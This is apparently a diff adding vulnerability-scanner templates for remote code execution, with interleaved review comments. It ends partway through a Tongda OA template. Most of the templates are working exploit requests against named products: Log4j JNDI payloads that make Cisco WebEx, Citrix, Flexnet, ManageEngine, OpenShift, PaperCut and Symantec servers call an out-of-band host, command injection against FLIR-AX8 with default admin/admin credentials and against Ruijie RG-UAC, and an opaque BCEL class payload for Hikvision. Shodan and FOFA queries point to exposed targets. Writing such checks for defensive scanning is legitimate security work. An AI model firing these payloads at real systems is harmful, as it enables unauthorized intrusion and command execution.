$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/remote_code_execution/cisco-webex-log4j-rce.yaml b/poc/remote_code_execution/cisco-webex-log4j-rce.yaml new file mode 100644 index 0000000000..ab879def50 --- /dev/null +++ b/poc/remote_code_execution/cisco-webex-log4j-rce.yaml 
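Review bot: The new matcher in the Hikvision hunk, `- "nt authority\\system"`, only accepts the Windows output of the `whoami` command carried in the `Testcmd` header, so any non-Windows deployment of the platform will be reported as not vulnerable even when the request succeeds; the template should either state that the check is Windows-specific or accept the equivalent non-Windows output so results are not silently negative. The metadata regressed in the same change: `name: HIKVISION` and `id: HIKVISION` no longer say which product or endpoint is tested, there is no `reference`, `tags` or `max-request`, and the description reads "Hackers can execute system commands through the vulnerability" without naming the `/bic/ssoService/v1/applyCT` endpoint or the affected versions. The request body embeds an opaque `$$BCEL$$` class blob whose behaviour cannot be audited from the template; the description should state exactly what that class does when loaded, otherwise reviewers and users cannot judge what the template executes on a target.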
@@ -0,0 +1,66 @@ +id: cisco-webex-log4j-rce + +info: + name: Cisco WebEx - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications. + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"Cisco WebEx" + tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /orion/login?siteurl=meet HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/orion/login?siteurl=meet&rnd=0.1359184728177283 + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded + + type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&bAjax=true + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 
${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4a0a00473045022042bdc493eb4ec91bbcbcd56ef58972f45032f56c91a340ccc75e523f1953badf022100b70c8852cc0ae3850e5574cc27f06e2eaed76319f53bbb9e1cfe7a4061bd3640:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml b/poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml new file mode 100644 index 0000000000..20e195261c --- /dev/null +++ b/poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml 
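Review bot: The same one-request Log4j skeleton is repeated in the citrix-xenapp, flexnet, manage-engine-dc, openshift, papercut and symantec-sepm hunks below, and in each the regex `'\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'` is pasted four times (one matcher, three extractors); if the engine expands `{{...}}` variables inside regex literals, hoist it into `variables:` as is already done for `rand1`/`rand2`/`str`, so the matcher and extractors cannot drift apart. `\d{6}` silently depends on `rand_int(111, 999)` producing exactly three digits twice; a comment next to `rand1`/`rand2` saying so would stop someone widening the range and breaking every match. `cwe-id: CWE-77` is questionable for CVE-2021-44228, which NVD classifies under CWE-917 (expression-language injection) with CWE-502 and CWE-20 as secondary — confirm before changing. The `Referer` header carries a hard-coded `rnd=0.1359184728177283`, a copied browser artefact that could use `{{rand_int(...)}}` or be dropped.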
@@ -0,0 +1,66 @@ +id: citrix-xenapp-log4j-rce + +info: + name: Citrix XenApp - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Citrix XenApp is susceptible to Log4j JNDI remote code execution. Citrix Virtual Apps is an application virtualization software produced by Citrix Systems that allows Windows applications to be accessed via individual devices from a shared server or cloud system. + reference: + - https://support.citrix.com/article/CTX335705 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: html:"/citrix/xenapp" + tags: cve,cve2021,rce,jndi,log4j,citrix,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /Citrix/XenApp/auth/login.aspx HTTP/1.1 + Host: {{Hostname}} + Cookie: WIClientInfo="clientConnSecure#false"; + Origin: {{RootURL}} + Referer: {{RootURL}}/Citrix/XenApp/auth/login.aspx?CTX_MessageType=WARNING&CTX_MessageKey=NoUsableClientDetected + Content-Type: application/x-www-form-urlencoded + + LoginType=Explicit&user=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - 
'\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4b0a00483046022100e171942cb747ce3d9809dcfe3b81a46cbe435f562bbe2f3d83c459f5afaa9cc70221009d87b7b176b4edcaa5c93030a3aa15370540c7b04c1944b606d06772b3047cec:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/flexnet-log4j-rce.yaml b/poc/remote_code_execution/flexnet-log4j-rce.yaml new file mode 100644 index 0000000000..69193dade5 --- /dev/null +++ b/poc/remote_code_execution/flexnet-log4j-rce.yaml 
@@ -0,0 +1,65 @@ +id: flexnet-log4j-rce + +info: + name: Flexnet - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Flexnet is susceptible to Log4j JNDI remote code execution. + reference: + - https://community.flexera.com/t5/Revenera-Company-News/Security-Advisory-Log4j-Java-Vulnerability-CVE-2021-4104-CVE/ba-p/216905 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"Flexnet" + tags: cve,cve2021,rce,jndi,log4j,flexnet,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /flexnet/logon.do HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/flexnet/logon.do + Content-Type: application/x-www-form-urlencoded + + action=logon&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&domain=FLEXnet + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 
4a0a0047304502201e397247560dd67fe86cf957ea8e3e2856cfd2606d51a3b3d70f23e75cd73a9b022100a8dce5b3e9cf02c644043a94451cf81a6d846d7e317fa365bd4c03a3aa4ff389:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/flir-ax8-rce.yaml b/poc/remote_code_execution/flir-ax8-rce.yaml new file mode 100644 index 0000000000..f3968a5fc4 --- /dev/null +++ b/poc/remote_code_execution/flir-ax8-rce.yaml 
@@ -0,0 +1,60 @@ +id: flir-ax8-rce + +info: + name: FLIR-AX8 res.php - Remote Code Execution + author: momika233 + severity: critical + description: | + Remote Command Execution vulnerability in the FLIR-AX8 res.php file, the attacker obtains server permissions after logging in to the background with the default password. + reference: + - https://www.exploit-db.com/exploits/45602 + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E8%8F%B2%E5%8A%9B%E5%B0%94/FLIR-AX8%20res.php%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 2 + fofa-query: app="FLIR-FLIR-AX8" + tags: flir-ax8,rce,exploitdb,iot,sensor,authenticated +variables: + username: admin + password: admin + +http: + - raw: + - | + POST /login/dologin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user_name={{username}}&user_password={{password}} + - | + POST /res.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=node&resource=$(id) + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains_all(to_lower(header_1), 'text/html','phpsessid','showcameraid') + - contains(body_1, 'success') + - status_code_1 == 200 && status_code_2 == 200 + condition: and + + - type: regex + part: body_2 + regex: + - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body_2 + regex: + - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)' + +# digest: 4b0a00483046022100d9a68cb898649a4b2ada6d43c1698cf65a7d1824941994462ffbdb06fea2825c022100e5e4915caac95332342a94a82137128012aad187741b9ebb71f90a1777754f41:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml b/poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml new file mode 100644 index 0000000000..68f7871503 --- /dev/null +++ b/poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml 
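Review bot: The regex `'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'` used in both the matcher and the extractor of the flir-ax8-rce hunk has a character class that also admits literal `(` and `)` — `[0-9(a-z)]` is almost certainly meant to be `[0-9a-z]` — and the loose class only widens what is accepted; `'uid=\d+\(\w+\) gid=\d+\(\w+\)'` would capture the intended fields. The third matcher, `type: status` with `200`, is redundant with `status_code_1 == 200 && status_code_2 == 200` already in the DSL matcher and can go. The `variables` block hard-codes the `admin`/`admin` pair; the description should say explicitly that the template only fires when the default credentials are still in use, which is the condition the `authenticated` tag is documenting.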
@@ -0,0 +1,65 @@ +id: manage-engine-dc-log4j-rce + +info: + name: Manage Engine Desktop Central - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Manage Engine Endpoint Central (formerly Desktop Central) is susceptible to Log4j JNDI remote code execution. Endpoint Central is a Unified Endpoint Management (UEM) & Endpoint protection suite that helps manage and secure various network devices + reference: + - https://pitstop.manageengine.com/portal/en/community/topic/log4j-security-issue + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"ManageEngine Desktop Central" + tags: cve,cve2021,rce,jndi,log4j,manage,engine,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /two_fact_auth HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/configurations + Content-Type: application/x-www-form-urlencoded + + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&j_password=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&otpTimeout=7&browserLocale=en_us&cacheNum=4&csrfPreventionSaltForFlashMessage= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: 
interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4b0a00483046022100d764e7744251fd005646d0bcd9c734f9a2753580ea18e8e00336e6d3a55ba7bb022100be8d729b7e98cdae21d2020d28d8df2df70b424712e5702a59cfa1761fdcd32c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/openshift-log4j-rce.yaml b/poc/remote_code_execution/openshift-log4j-rce.yaml new file mode 100644 index 0000000000..06b115ee26 --- /dev/null +++ b/poc/remote_code_execution/openshift-log4j-rce.yaml 
@@ -0,0 +1,65 @@ +id: openshift-log4j-rce + +info: + name: OpenShift - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + OpenShift is susceptible to Log4j JNDI remote code execution. OpenShift is a unified platform to build, modernize, and deploy applications at scale. + reference: + - https://access.redhat.com/security/cve/cve-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"OpenShift" + tags: cve,cve2021,rce,jndi,log4j,openshift,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /Login HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/login?then=/oauth/authorize?client_id=openshift-web-console&idp=basic&redirect_uri={{BaseURL}}/console/oauth&response_type + Content-Type: application/x-www-form-urlencoded + + then=%2Foauth%2Fauthorize%3Fclient_id%3Dopenshift-web-console%26idp%3Dbasic%26redirect_uri%3D${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}26response_type%3Dcode&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output# + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 
+ regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4a0a00473045022100e04b557ecaf5c9bdd9fbed42c94e8a9c41bc2a3063bdf843bde20f58f53de29a0220493cef11b3504b961b48b9a583ac4ecb56d3d918715a4acf09426fa4a60ec300:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/papercut-log4j-rce.yaml b/poc/remote_code_execution/papercut-log4j-rce.yaml new file mode 100644 index 0000000000..2665b9e720 --- /dev/null +++ b/poc/remote_code_execution/papercut-log4j-rce.yaml 
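Review bot: In the openshift hunk the inline comment on the second matcher ends with a stray `#` (`... in output#`) that the other six templates do not have; drop it. The `then=` form value contains `...{{str}}}26response_type%3Dcode`, where the `%` before `26` appears to have been lost, so the parameter is no longer a correctly URL-encoded `&response_type=code` — confirm this is a typo rather than intended. The matcher and extractor structure otherwise duplicates the cisco-webex template and inherits the same repeated-regex point raised there.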
@@ -0,0 +1,65 @@ +id: papercut-log4j-rce + +info: + name: Papercut - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Papercut is susceptible to Log4j JNDI remote code execution. Papercut is a print management system. + reference: + - https://www.papercut.com/kb/Main/Log4Shell-CVE-2021-44228#product-status + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"Papercut" + tags: cve,cve2021,rce,jndi,log4j,papercut,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /app HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/app + Content-Type: application/x-www-form-urlencoded + + service=direct%2F1%2FHome%2F%24Form&sp=S0&Form0=%24Hidden%240%2C%24Hidden%241%2CinputUsername%2CinputPassword%2C%24Submit%240%2C%24PropertySelection&%24Hidden%240=true&%24Hidden%241=X&inputUsername=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&inputPassword=a&%24Submit%240=Log+in&%24PropertySelection=en + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + + extractors: + - type: kval + kval: + - interactsh_ip + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + + - type: regex + part: interactsh_request + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + +# digest: 
4a0a00473045022100e1f717ae6d14de12635cdb28abdf4a0ebd07b6880b8b8bafc11066425dbc7b72022033366236333a7cfb5beb96ae8591c82dddbd5fc8b3c457964828061cc786d216:922c64590222798bb761d5b6d8e72950 diff --git a/poc/remote_code_execution/ruijie-nmc-sync-rce.yaml b/poc/remote_code_execution/ruijie-nmc-sync-rce.yaml new file mode 100644 index 0000000000..0c074ed732 --- /dev/null +++ b/poc/remote_code_execution/ruijie-nmc-sync-rce.yaml 
@@ -0,0 +1,40 @@
+id: ruijie-nmc-sync-rce
+
+info:
+ name: Ruijie RG-UAC nmc_sync.php - Remote Code Execution
+ author: DhiyaneshDk
+ severity: critical
+ description: |
+ There is a command execution vulnerability in the nmc_sync.php interface of Ruijie's RG-UAC unified online behavior management and audit system. An unauthenticated attacker can execute arbitrary commands to control server permissions.
+ reference:
+ - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py
+ metadata:
+ verified: true
+ max-request: 3
+ fofa-query: title="RG-UAC登录页面" && body="admin"
+ tags: rg-uac,file-upload,intrusive,ruijie
+variables:
+ random_str: "{{rand_base(6)}}"
+ match_str: "{{md5(random_str)}}"
+
+http:
+ - raw:
+ - |
+ GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|echo+{{match_str}}+>+{{random_str}}.txt|cat HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /view/systemConfig/management/{{random_str}}.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|rm+{{random_str}}.txt|cat HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 200 && status_code_2 == 200"
+ - "contains(body_2, '{{match_str}}')"
+ condition: and
+# digest: 4b0a004830460221009a7c5ba834a96f9836326553b14fe11787d36d06478e011a287734e645e964de022100bd2b9ac186ec1a2565bba42a5ad370496877fc519f64a830aae2159ab3b7bf44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/remote_code_execution/symantec-sepm-log4j-rce.yaml b/poc/remote_code_execution/symantec-sepm-log4j-rce.yaml
new file mode 100644
index 0000000000..2c06ac05f8
--- /dev/null
+++ b/poc/remote_code_execution/symantec-sepm-log4j-rce.yaml
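Review bot: The `tags` line (`rg-uac,file-upload,intrusive,ruijie`) mislabels the check: the requests are OS command injection through `template_path`, not a file upload, and the `rce` tag carried by the sibling templates in this directory is missing, so tag-based selection or exclusion will miss this one; suggest `tags: rg-uac,rce,intrusive,ruijie`. `intrusive` is correctly set, since request 1 writes `{{random_str}}.txt` under the web root and request 3 removes it, but the description should say so and should note that the cleanup is not verified by the matcher, so a file can be left behind when request 3 fails. The percent-encoded filename in `reference` appears to name an EG gateway PoC rather than RG-UAC, which is worth confirming against the product this template targets.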
@@ -0,0 +1,67 @@
+id: symantec-sepm-log4j-rce
+
+info:
+ name: Symantec SEPM - Remote Code Execution (Apache Log4j)
+ author: shaikhyaser
+ severity: critical
+ description: |
+ Symantec SPEM is susceptible to Log4j JNDI remote code execution.
+ reference:
+ - https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2021-44228
+ cwe-id: CWE-77
+ metadata:
+ max-request: 1
+ shodan-query: title:"Symantec Endpoint Protection Manager"
+ tags: cve,cve2021,rce,jndi,log4j,symantec,oast,kev
+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+ str: "{{rand_base(5)}}"
+
+http:
+ - raw:
+ - |
+ POST /console/apps/sepm HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: cookieTest=true;
+ Origin: {{RootURL}}
+ Referer: {{RootURL}}/console/apps/sepm
+ X-Requested-With: XMLHttpRequest
+ Content-Type: application/x-www-form-urlencoded
+
+ actionString=%2Fnoupdate%2FSEPMPasswordField_{{field}}%2F&storedActions%5B%5D=%2Ftype%2FSEPMPasswordField_{{field}}%2F${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&__Action=v4&__FastSubmit=true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
+
+ extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+ part: interactsh_request
+
+ - type: regex
+ group: 1
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
+ part: interactsh_request
+
+# digest: 490a0046304402200fa2ca5045e6f837fba6ea0db9f6febc7565be37982ea64e6cc8ec4efc48620c02206b6de92da70f7d230a90376740999d3b8a8416d5f543e7980c1f19a7eab5f055:922c64590222798bb761d5b6d8e72950
diff --git a/poc/remote_code_execution/tongda-getdata-rce.yaml b/poc/remote_code_execution/tongda-getdata-rce.yaml
new file mode 100755
index 0000000000..aff30a4d58
--- /dev/null
+++ b/poc/remote_code_execution/tongda-getdata-rce.yaml
@@ -0,0 +1,37 @@
+id: tongda-getdata-rce
+
+info:
+ name: Tongda OA v11.9 getadata - Remote Code Execution
+ author: SleepingBag945
+ severity: critical
+ description: |
+ There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability.
+ reference:
